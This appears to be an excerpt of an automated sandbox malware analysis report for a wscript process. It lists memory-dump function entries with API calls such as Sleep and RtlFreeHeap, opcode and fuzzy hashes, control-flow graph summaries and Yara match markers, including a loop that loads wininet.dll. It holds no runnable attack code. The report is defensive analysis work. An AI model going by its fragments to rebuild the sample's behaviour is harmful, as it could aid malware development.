                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                                                      • Instruction ID: caaebf1f0d05a3afef909da6cbe30ccde6204b6b2363711ba77af55cd709ee9d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9ED01776251214ABD714EB98CC85EA77BADEF48760F15449ABA189B242C930FA00CAE0
                                                                                                                                                                                                                      Function 04AD2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 75b22f478c23315e758411c4970c7da482a593561412c46583ea1c91e2457aec
                                                                                                                                                                                                                      • Instruction ID: c9a33e336981e9a2238e90c595223e2180d16a2594b096db99ae847b05d90528
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75b22f478c23315e758411c4970c7da482a593561412c46583ea1c91e2457aec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D690023120140402F1007599540865600058BE0305F96D015A5125755EC669D9917131
                                                                                                                                                                                                                      Function 04AD2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: d6f2e11f085f8c68873a4d35adfbccfa5b27c8d278ea02a99766afa3d4314bbd
                                                                                                                                                                                                                      • Instruction ID: 7c5ff500dccad31e1c1fad7a7520007ebeaf9ae07f7c765f2b4030d881d1ded7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6f2e11f085f8c68873a4d35adfbccfa5b27c8d278ea02a99766afa3d4314bbd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D90023120140842F10071594404B5600058BE0305F96C01AA0225754D8619D9517521
                                                                                                                                                                                                                      Function 04AD2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: ca31bfd1127b76515fd9d2ffeee000d7c757f558be6804b679c39d6d53e09096
                                                                                                                                                                                                                      • Instruction ID: 651caf959a6dff8a47928ee42b05213f8f7c7d7ab165540a1d20d6aec22bf706
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca31bfd1127b76515fd9d2ffeee000d7c757f558be6804b679c39d6d53e09096
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C90023120148802F1107159840475A00058BD0305F9AC415A4525758D8699D9917121
                                                                                                                                                                                                                      Function 04AD2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 859524d43ef83739ff45119f503b91aab445c407ccd472d5f6528d8be1f4f71d
                                                                                                                                                                                                                      • Instruction ID: d21a649846b56f064469cb71124a6244f95e0cdf9e7c88c8890ccebd4574f5db
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 859524d43ef83739ff45119f503b91aab445c407ccd472d5f6528d8be1f4f71d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2590023120140413F1117159450471700098BD0245FD6C416A0525758D965ADA52B121
                                                                                                                                                                                                                      Function 04AD2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 3d99c33ee593d9da44464f933ef35ebd1ce2df3d01b1da28eb4b93b39dd8cf14
                                                                                                                                                                                                                      • Instruction ID: 2cdcefdbd2b3d9873c236d96a2bce2be7cd7f886105cc4657bd334e5be5426b3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d99c33ee593d9da44464f933ef35ebd1ce2df3d01b1da28eb4b93b39dd8cf14
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41900221242441527545B159440451740069BE02457D6C016A1515B50C852AE956E621
                                                                                                                                                                                                                      Function 04AD2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: c0dc31fa95dd5c11ea372aa03d793fe2ea299574c18ee2311322b6626d003a81
                                                                                                                                                                                                                      • Instruction ID: cde0228f571fa618ab931c9146b24fe5e4a099f865b02ce5b95adbb27c84f61e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0dc31fa95dd5c11ea372aa03d793fe2ea299574c18ee2311322b6626d003a81
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B90022921340002F1807159540861A00058BD1206FD6D419A0116758CC919D9696321
                                                                                                                                                                                                                      Function 04AD2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: d3f3543daafe7da19c74f14d638d42a243b104df97ec7a28abe680d6dda7ee15
                                                                                                                                                                                                                      • Instruction ID: 5e16768aa15078a82432b769ec6c997a730cb5020dc077ee3f4b3bc65780f38b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3f3543daafe7da19c74f14d638d42a243b104df97ec7a28abe680d6dda7ee15
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6090027120140402F1407159440475600058BD0305F96C015A5165754E865DDED57665
                                                                                                                                                                                                                      Function 04AD2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 9e02de4fc87ad7c90a6f1a7e961290eb63d5cc83614507340f1c9bd28c3d30bd
                                                                                                                                                                                                                      • Instruction ID: 848a5732dec254ed731cab230a92a535d26d769ae8f841369a2be3788a81db18
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e02de4fc87ad7c90a6f1a7e961290eb63d5cc83614507340f1c9bd28c3d30bd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7900221211C0042F20075694C14B1700058BD0307F96C119A0255754CC919D9616521
                                                                                                                                                                                                                      Function 04AD2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 24ffa52a6e6cc75a16b03bd5c0c5259cb80251a7b7752bb67e7106cf671acffb
                                                                                                                                                                                                                      • Instruction ID: 89d42cd420aefba2d2889cf0956ab11a0bab3b26461829ca43bc1ade09c37163
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24ffa52a6e6cc75a16b03bd5c0c5259cb80251a7b7752bb67e7106cf671acffb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8890026134140442F10071594414B160005CBE1305F96C019E1165754D861DDD527126
                                                                                                                                                                                                                      Function 04AD2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 339ab821869f10f13da315733b71980f21c72a3b5a8e09d51fdb7f4ba9f87721
                                                                                                                                                                                                                      • Instruction ID: 123adce96829fb5d873cc20dfa722b06e36a2eff2a05bf1efb7639aca96720a7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 339ab821869f10f13da315733b71980f21c72a3b5a8e09d51fdb7f4ba9f87721
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9900225211400032105B559070451700468BD5355396C025F1116750CD625D9616121
                                                                                                                                                                                                                      Function 04AD2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: ac00d83289798f9d9ae39281a85950a27414f312084d4bdb9b5d8c481067b9d5
                                                                                                                                                                                                                      • Instruction ID: 395a97228bca1ad15427be2536b6124b4a8523856a2163e4c77d7aabda5b5030
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac00d83289798f9d9ae39281a85950a27414f312084d4bdb9b5d8c481067b9d5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7790023120544842F14071594404A5600158BD0309F96C015A0165794D9629DE55B661
                                                                                                                                                                                                                      Function 04AD2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: dbfe7a220ab01ea7b3ad407feda8acd54616b537ba1ad0fdea77dfb15aa6a362
                                                                                                                                                                                                                      • Instruction ID: 3ec246e1477be9a79b2dfc5a792bfb40754428c60d6a3e00ffa4b8340c6e9422
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbfe7a220ab01ea7b3ad407feda8acd54616b537ba1ad0fdea77dfb15aa6a362
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B90023120140802F1807159440465A00058BD1305FD6C019A0126754DCA19DB5977A1
                                                                                                                                                                                                                      Function 04AD2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 19986212c0af383ebfa8cdadea74d88084310d4bc3c55487c1a53f93aacf628a
                                                                                                                                                                                                                      • Instruction ID: ad749f32cef39f0225fde5224090ecb940c682d18784efa0e86291b536847da2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19986212c0af383ebfa8cdadea74d88084310d4bc3c55487c1a53f93aacf628a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D90026120240003610571594414626400A8BE0205B96C025E1115790DC529D9917125
                                                                                                                                                                                                                      Function 04AD35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 1fdcb1e5693b10d9e505ed31606527ea788495b6449f75db79a533405e33eb8d
                                                                                                                                                                                                                      • Instruction ID: 55e88557a9dc62c31e2bba6aedce006fd605bd178c3e5acce671bf6945d7f3be
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fdcb1e5693b10d9e505ed31606527ea788495b6449f75db79a533405e33eb8d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4790023160550402F1007159451471610058BD0205FA6C415A0525768D8799DA5175A2
                                                                                                                                                                                                                      Function 02A19050 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 399 2a19050-2a1907f 400 2a1908b-2a19092 399->400 401 2a19086 call 2a1bd10 399->401 402 2a19098-2a190e8 call 2a1bde0 call 2a0acf0 call 2a14e50 400->402 403 2a1916c-2a19172 400->403 401->400 410 2a190f0-2a19101 Sleep 402->410 411 2a19103-2a19109 410->411 412 2a19166-2a1916a 410->412 413 2a19133-2a19153 411->413 414 2a1910b-2a19131 call 2a18c70 411->414 412->403 412->410 415 2a19159-2a1915c 413->415 416 2a19154 call 2a18e80 413->416 414->415 415->412 416->415
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02A190F8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                      • Opcode ID: 30e68675f47128e6697a39df551ce3d373fe7b037c03455ab2d49be5d1f12590
                                                                                                                                                                                                                      • Instruction ID: 26e1d26cbb6c213fa610af46f9ba03918e97d43b7645ac7cafcda06417553522
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30e68675f47128e6697a39df551ce3d373fe7b037c03455ab2d49be5d1f12590
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6831B0B2940341ABC724DF64C8C5FA7B7B9BB48B10F00841DFA2A5B245DB30B654CBA8
                                                                                                                                                                                                                      Function 02A19049 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 419 2a19049-2a19092 call 2a1bd10 422 2a19098-2a190e8 call 2a1bde0 call 2a0acf0 call 2a14e50 419->422 423 2a1916c-2a19172 419->423 430 2a190f0-2a19101 Sleep 422->430 431 2a19103-2a19109 430->431 432 2a19166-2a1916a 430->432 433 2a19133-2a19153 431->433 434 2a1910b-2a19131 call 2a18c70 431->434 432->423 432->430 435 2a19159-2a1915c 433->435 436 2a19154 call 2a18e80 433->436 434->435 435->432 436->435
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02A190F8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                      • Opcode ID: 0580fe8453154d238eae4deea3b2d4fb2bbe8d82443424f7b81d6cc4b1d9294d
                                                                                                                                                                                                                      • Instruction ID: 7a56bdb3d23921174e8d4fdf6c4c492398c8acd6758e2cc2eae284173d634032
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0580fe8453154d238eae4deea3b2d4fb2bbe8d82443424f7b81d6cc4b1d9294d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8021D2B2940341AFCB24DF68C8C5FABB7B5FB48710F10801DEA296B245DB70A654CFA4
                                                                                                                                                                                                                      Function 02A1A632 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 556 2a1a632-2a1a657 call 2a1af30 558 2a1a65c-2a1a671 RtlFreeHeap 556->558
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A03AF8), ref: 02A1A66D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
